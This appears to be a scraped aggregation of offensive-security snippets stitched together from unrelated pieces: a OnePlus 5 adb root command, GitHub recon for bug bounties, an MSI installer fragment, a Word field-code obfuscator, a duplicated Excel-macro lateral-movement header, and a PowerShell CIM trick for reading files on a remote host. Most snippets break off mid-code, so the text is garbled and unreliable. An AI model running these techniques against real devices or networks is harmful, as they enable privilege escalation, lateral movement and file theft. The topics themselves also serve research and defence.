unbaiat unbaiat

Root OnePlus5 without unlocking the bootloader

Gain adb root.

$ adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "angela"

Download Magisk-v14.0 and extract it somewhere. Download MagiskManager.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output

	<?xml version="1.0"?>
	<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
	<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
	<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
	<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>

	<Directory Id="TARGETDIR" Name="SourceDir">
	<Directory Id="ProgramFilesFolder">
	<Directory Id="INSTALLLOCATION" Name="Example">
	<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">

	#!/usr/env/python

	print("Converts a string to the {QUOTE} Field code")
	st = raw_input("String to convert: ")
	v = map(lambda y: "%s"%ord(y),st)
	print("{ QUOTE %s }"%' '.join(v))

	function Get-ClrReflection
	{
	<#
	.SYNOPSIS

	Detects memory-only CLR (.NET) modules

	Author: Joe Desimone (@dez_)
	License: BSD 3-Clause

	function Invoke-ExcelMacroPivot{
	<#
	.AUTHOR
	Matt Nelson (@enigma0x3)
	.SYNOPSIS
	Pivots to a remote host by using an Excel macro and Excel's COM object
	.PARAMETER Target
	Remote host to pivot to
	.PARAMETER RemoteDocumentPath
	Local path on the remote host where the payload resides

	function Invoke-ExcelMacroPivot{
	<#
	.AUTHOR
	Matt Nelson (@enigma0x3)
	.SYNOPSIS
	Pivots to a remote host by using an Excel macro and Excel's COM object
	.PARAMETER Target
	Remote host to pivot to
	.PARAMETER RemoteDocumentPath
	Local path on the remote host where the payload resides

	#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"

	open System.Management.Automation
	open System.Management.Automation.Runspaces
	open System

	let runSpace = RunspaceFactory.CreateRunspace()
	runSpace.Open()
	let pipeline = runSpace.CreatePipeline()

	$CimSession = New-CimSession -ComputerName 10.0.0.2

	$FilePath = 'C:\Windows\System32\notepad.exe'

	# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
	$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
	$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
	$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
	$FileLengthBytes = $FileContents.FileData[0..3]
	[Array]::Reverse($FileLengthBytes)

	# twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API
	# limits, so if you have a gazillion favorites, you probably won't get them all. YMMV
	#
	# Author: @curi0usJack
	#
	# Dependencies:
	# Tweepy: sudo pip install tweepy
	# Twitter API access. Set up here: https://apps.twitter.com/

	import tweepy